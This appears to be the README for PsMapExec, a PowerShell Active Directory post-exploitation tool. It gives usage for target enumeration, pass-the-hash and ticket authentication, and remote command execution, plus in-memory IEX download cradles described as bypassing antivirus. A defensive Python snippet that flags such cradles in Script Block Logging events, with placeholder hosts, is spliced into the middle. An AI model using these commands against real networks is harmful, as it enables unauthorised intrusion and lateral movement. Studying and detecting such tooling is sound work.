PsMapExec: Active Directory post-exploitation tool

What is PsMapExec

A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.

PsMapExec is used as a post-exploitation tool to assess and compromise an Active Directory environment.

What methods does it support?

Currently supported methods (Protocols)

  • RDP
  • SessionHunter
  • SMB
  • SMB Signing
  • Spraying (Hash, Password, EmptyPassword and AccountAsPassword)
  • VNC
  • WinRM
  • WMI

Planned methods

  • MSSQL (In testing)
  • IPMI
  • SNMP (In testing)
  • FTP
  • SSH

Load the script directly into memory (Bypass AV)

IEX(New-Object System.Net.WebClient).DownloadString("");IEX(New-Object System.Net.WebClient).DownloadString("")

Load the script directly into memory

IEX(New-Object System.Net.WebClient).DownloadString("")
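From the defender's side, the cradle above never writes a script file to disk, so the place to catch it is PowerShell Script Block Logging (Event ID 4104). The following is an added Python example, not part of the PsMapExec project: it scans constructed 4104-style events and flags any block where remotely fetched content is handed straight to Invoke-Expression, generalizing from DownloadString to Invoke-WebRequest/iwr; the hostnames and URLs in the samples are made up.

```python
import re

# Constructed sample Script Block Logging events (Event ID 4104); not real telemetry.
# Each entry mimics the ScriptBlockText field a SIEM would receive.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "text": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"id": 2, "host": "WS02", "text": "IEX(New-Object System.Net.WebClient).DownloadString('http://placeholder.invalid/PsMapExec.ps1')"},
    {"id": 3, "host": "SRV03", "text": "Invoke-Expression (New-Object Net.WebClient).DownloadString(\"http://placeholder.invalid/a.ps1\")"},
    {"id": 4, "host": "DC01", "text": "$c = New-Object System.Net.WebClient; $c.DownloadFile('http://placeholder.invalid/x.zip','C:\\x.zip')"},
    {"id": 5, "host": "WS04", "text": "iex (iwr http://placeholder.invalid/p.ps1 -UseBasicParsing).Content"},
]

# Indicators of an in-memory download cradle: a remote fetch whose result is
# passed straight to Invoke-Expression, so no script file touches disk.
# DownloadFile alone (event 4) is not flagged: it writes to disk and is caught by file-based controls.
FETCH_RE = re.compile(r"(DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b)", re.I)
EXEC_RE = re.compile(r"(\biex\b|Invoke-Expression)", re.I)
TOOL_RE = re.compile(r"PsMapExec", re.I)


def classify(text: str) -> list:
    """Return the reasons an event looks like an in-memory loader, or [] if benign."""
    reasons = []
    if FETCH_RE.search(text) and EXEC_RE.search(text):
        reasons.append("remote content piped to Invoke-Expression")
    if TOOL_RE.search(text):
        reasons.append("PsMapExec referenced in script block")
    return reasons


def scan(events: list) -> list:
    """Run classify() over 4104-style events and return only the suspicious ones."""
    hits = []
    for ev in events:
        reasons = classify(ev["text"])
        if reasons:
            hits.append({"id": ev["id"], "host": ev["host"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"event {hit['id']} on {hit['host']}: {'; '.join(hit['reasons'])}")
```

Script Block Logging must be enabled (via Group Policy or the PowerShell Core Logging registry keys) for 4104 events to exist at all; the scan also assumes the blocks are not obfuscated beyond case changes.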

Target Acquisition

Target acquisition in PsMapExec is performed through ADSI Searcher. As long as you are operating from a domain-joined system as a domain user account, no issues should be encountered when acquiring targets. By default only enabled Active Directory computer accounts are populated into the target list. PsMapExec sets the domain to the current user's domain unless -Domain is specified. Specifying targets by IP address or from a file is currently unsupported but in development.

# Grabs all workstations, servers and domain controllers within the domain
PsMapExec -Targets All

# Grabs all workstations, servers and domain controllers on the specified domain
PsMapExec -Targets All -Domain [Domain]

# Grabs only servers from the domain
PsMapExec -Targets Servers

# Grabs only Domain Controllers from the domain
PsMapExec -Targets DCs

# Grabs only workstations from the domain
PsMapExec -Targets Workstations

# Set the target values to a defined computer name
PsMapExec -Targets DC01.Security.local

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec -Targets All -Method [Method]

# With Password
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# With Hash
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# With Ticket
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI only)
PsMapExec -Targets All -Method WMI -LocalAuth

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to any of the above Authentication Types to execute the given command as the specified user or the current user.

PsMapExec -Targets All -Method [Method] -Command [Command]

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to any of the above Authentication Types to execute the given module as the specified user or the current user.

PsMapExec -Targets All -Method [Method] -Module [Module]
